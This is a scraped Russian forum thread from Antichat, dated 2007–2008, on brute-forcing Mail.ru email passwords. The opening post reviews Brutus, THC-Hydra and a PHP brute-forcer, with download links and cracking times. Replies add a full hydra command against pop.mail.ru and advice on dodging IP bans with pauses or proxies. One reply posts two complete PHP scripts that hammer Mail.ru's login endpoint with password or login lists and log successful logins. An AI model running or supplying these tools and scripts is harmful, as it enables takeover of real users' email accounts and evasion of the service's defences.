Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
18.12.2007, 13:38
|
|
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме:
3986705
Репутация:
1403
|
|
Чем брутить Mail.ru
Чем брутить Mail.ru
Тестировать будем сервер pop.mail.ru
Заранее создадим пользователя и будем пытаться достать на него пароль...
Создали пользователя cccbbbaaa@mail.ru:alphabet
Будем атаковать по словарю, т.к. полным перебором смысла нет в данном случае... Время скорости полного перебора зависит от сложности пароля...
Создал словарь 819 слов, где 818 - наш
1. Brutus-AET2
Самый известный и многофункциональный брутфорс. Небольшое описание:
Brutus - удаленный опознавательный агент (проще взломщик паролей). Brutus используется для восстановления правильных маркеров доступа (обычно имя пользователя и пароль) для данной системы. Примерами поддерживаемой системы могут быть FTP сервер, пароль защищенная web-страница, консоль маршрутизатора, POP3 сервер и т.д.
Предупреждение! Некоторые антивирусы реагируют на эту программу как "злонамеренная программа".
Платформа: Windows
Тут: http://www.securitylab.ru/software/232832.php
Скачать: http://securitylab.ru/_tools/brutus-aet2.zip
---
Как им пользоваться, смотрим видео: http://video.antichat.ru/file109.html
---
Итак брутим наше мыло:
Brutus Потратил 24 секунды на взлом нашего мыла...
2. THC-Hydra
Отличный брутфорс под nix.
THC-Hydra - распараллеленый взломщик паролей к различным сервисам (FTP, POP3, IMAP, Telnet, HTTP Auth, NNTP, VNC, ICQ, PCNFS, CISCO и др.) для UNIX платформ. С помощью этой утилиты вы можете атаковать несколько сервисов одновременно.
http://www.securitylab.ru/software/233034.php
http://freeworld.thc.org/thc-hydra/
---
Как пользоваться смотрим видео: http://video.antichat.ru/file110.html
---
Hydra потратила 17 секунд на взлом нашего мыла...
---
3. PHP Mail.Ru BruteForce by NOmeR1
Обсуждение: https://forum.antichat.ru/thread49574.html
Решил его сюда включить, т.к. скипт очень интересный и получил хорошие отзывы... Он не использует сокеты, он как бы пытаеться залогиниться через страницу mail.ru =)
---
Пользоваться очень легко, достаточно ввести нужное мыло, ваше мыло, и файл - словарь...
---
Скрипт потратил меньше 20 секунд на взлом нашего мыла...
---
Пожалуйста постим сюда только брутер и инфу...
За каждую дельную инфу ставлю +5 =)
Последний раз редактировалось bul.666; 18.12.2007 в 16:14..
|
|
|
18.12.2007, 13:43
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874
Репутация:
1020
|
|
Последний раз редактировалось AkyHa_MaTaTa; 18.12.2007 в 14:06..
|
|
|
|
18.12.2007, 13:46
|
|
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме:
3986705
Репутация:
1403
|
|
Пока потестил тока эти... Это не "Обзор всех брутеров"... По мере возможности буду выкладывать, что потестил...
|
|
|
|
27.02.2008, 20:18
|
|
Banned
Регистрация: 10.06.2006
Сообщений: 938
Провел на форуме:
7792614
Репутация:
1223
|
|
Да бесмысленно это всё уже, если нет потдержки прокси, маил уже банит за брут по айпи
|
|
|
|
27.02.2008, 20:49
|
|
Banned
Регистрация: 22.08.2006
Сообщений: 608
Провел на форуме:
6144796
Репутация:
1095
|
|
>> Да бесмысленно это всё уже, если нет потдержки прокси, маил уже банит за брут по айпи
кто-нибудь, знает после скольки попыток там банят по айпи ? )
если по http брутить?
|
|
|
|
28.02.2008, 07:32
|
|
Banned
Регистрация: 10.06.2006
Сообщений: 938
Провел на форуме:
7792614
Репутация:
1223
|
|
Я как понялтам повремени банят, попытки не считал, т.к. каждый раз было по разному, и скорость перебора была разная, мой вывод был только по времени бесприрывного перебора, так что есть вариант делать паузы а естьв ариант прокси юзать, но брута под маил хттп с прокси я не видел.
|
|
|
|
07.03.2008, 23:07
|
|
Познающий
Регистрация: 27.01.2008
Сообщений: 76
Провел на форуме:
596771
Репутация:
58
|
|
У меня вопрос а может быть што неудастся сбрутить мылн с первого раза
|
|
|
|
14.03.2008, 20:11
|
|
Новичок
Регистрация: 11.03.2008
Сообщений: 6
Провел на форуме:
26723
Репутация:
2
|
|
У меня вопрос а можно более подробгое руководство по Aet2 про все функции?
|
|
|
|
14.03.2008, 20:39
|
|
Постоянный
Регистрация: 20.12.2007
Сообщений: 577
Провел на форуме:
1636674
Репутация:
171
|
|
гидру юзай...
hydra -l login -P dictionary.dic -e ns -o log.txt -v pop.mail.ru pop3
она и побыстрее и в ней все мегапросто )
|
|
|
|
16.03.2008, 11:11
|
|
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме:
500748
Репутация:
137
|
|
гыг вот я тоже решил небольшой брутер майла на пхп написать
для брута одного логина несколькими паролями
PHP код:
<?php
$login="testbrute";
$passfile = "pass.txt";
for ($doscriot=0;$doscriot<=count($contents);$doscriot++)
{
$passfile = "pass.txt";
$handle = fopen($passfile,"r");
$contents = fread($handle,filesize($passfile));
fclose($handle);
$contents = explode("\n",$contents);
$parol=trim($contents[$doscriot]);
$hostname = "win.mail.ru";
$path = "/cgi-bin/auth";
$line = "";
$fp = fsockopen($hostname, 80, $errno, $errstr, 30);
if (!$fp) echo "$errstr ($errno)<br />\n";
else
{
$data = "Login=".$login."&Domain=mail.ru&Password=".$parol."&Mpopl=693039118\r\n\r\n";
$headers = "POST $path HTTP/1.1\r\n";
$headers .= "Host: $hostname\r\n";
$headers .= "Content-type: application/x-www-form-urlencoded\r\n";
$headers .= "Content-Length: ".strlen($data)."\r\n\r\n";
fwrite($fp, $headers.$data);
while (!feof($fp))
{
$line .= fgets($fp, 1024);
}
fclose($fp);
}
if($line[9]=="3")
{
$zergood = 'good.txt';
$somecontent = " для логина ".$login." пароль ".$parol;
if (is_writable($zergood)) {
if (!$udacha = fopen($zergood, 'a')) {
echo "Не могу открыть файл ($zergood)";
exit;
}
if (fwrite($udacha, $somecontent) === FALSE) {
echo "Не могу произвести запись в файл ($zergood)";
exit;
}
echo "Ура! сбручено ($somecontent) и записано в файл ($zergood)";
fclose($udacha);
} else {
echo "Файл $zergood недоступен для записи";
}
}
}
?>
для брута одного пароля на несколько логинов
PHP код:
<?php
$parol="123456";
$loginsfile = "login.txt";
for ($doscriot=0;$doscriot<=count($contents);$doscriot++)
{
$loginsfile = "login.txt";
$handle = fopen($loginsfile,"r");
$contents = fread($handle,filesize($loginsfile));
fclose($handle);
$contents = explode("\n",$contents);
$loginsss=trim($contents[$doscriot]);
$hostname = "win.mail.ru";
$path = "/cgi-bin/auth";
$line = "";
$fp = fsockopen($hostname, 80, $errno, $errstr, 30);
if (!$fp) echo "$errstr ($errno)<br />\n";
else
{
$data = "Login=".$loginsss."&Domain=mail.ru&Password=".$parol."&Mpopl=693039118\r\n\r\n";
$headers = "POST $path HTTP/1.1\r\n";
$headers .= "Host: $hostname\r\n";
$headers .= "Content-type: application/x-www-form-urlencoded\r\n";
$headers .= "Content-Length: ".strlen($data)."\r\n\r\n";
fwrite($fp, $headers.$data);
while (!feof($fp))
{
$line .= fgets($fp, 1024);
}
fclose($fp);
}
if($line[9]=="3")
{
$zergood = 'good.txt';
$somecontent = " у пароля ".$parol." логин ".$loginsss;
if (is_writable($zergood)) {
if (!$udacha = fopen($zergood, 'a')) {
echo "Не могу открыть файл ($zergood)";
exit;
}
if (fwrite($udacha, $somecontent) === FALSE) {
echo "Не могу произвести запись в файл ($zergood)";
exit;
}
echo "Ура! сбручено ($somecontent) и записано в файл ($zergood)";
fclose($udacha);
} else {
echo "Файл $zergood недоступен для записи";
}
}
}
?>
результат запишется в файл good.txt по окончанию
лично моё мнение брутить со своей машины это жесть для траффика вот небольшой подарок у кого не анлимит запустил скрипт выключил комп лёг спать и за тебя твой сайт всё сделает и никакого расхода трафика)
Последний раз редактировалось ZET36; 16.03.2008 в 11:19..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
